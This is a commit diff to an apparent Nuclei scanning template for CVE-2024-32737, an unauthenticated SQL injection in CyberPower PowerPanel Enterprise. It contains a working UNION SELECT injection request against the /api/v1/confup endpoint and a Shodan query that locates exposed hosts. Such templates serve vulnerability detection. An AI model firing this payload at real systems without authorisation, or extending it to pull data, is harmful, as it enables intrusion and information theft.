Update CVE-2024-32737.yaml

http/cves/2024/CVE-2024-32737.yaml

@@ -1,16 +1,17 @@
 id: CVE-2024-32737
 
 info:
-  name: CyberPower - SQL Injection in MCUDBHelper (Contract Result Query)
+  name: CyberPower - SQL Injection
   author: DhiyaneshDk
   severity: high
   description: |
-    A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. 
+    A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
   impact: |
     An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper.
   reference:
     - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
     - https://www.tenable.com/security/research/tra-2024-14
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32737
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -21,13 +22,13 @@ info:
   metadata:
     verified: true
     max-request: 1
+    shodan-query: html:"<title>PDNU</title>"
   tags: cve,cve2024,cyberpower,sqli
 
 http:
-  - raw:
+  - method: GET
-      - |
+    path:
-        GET /api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1
+      - "{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"
-        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
@@ -51,4 +52,4 @@ http:
       - type: regex
         group: 1
         regex:
-          - '"modifiedtime":(["0-9.]+)"'
+          - '"modifiedtime":"([0-9.]+)"'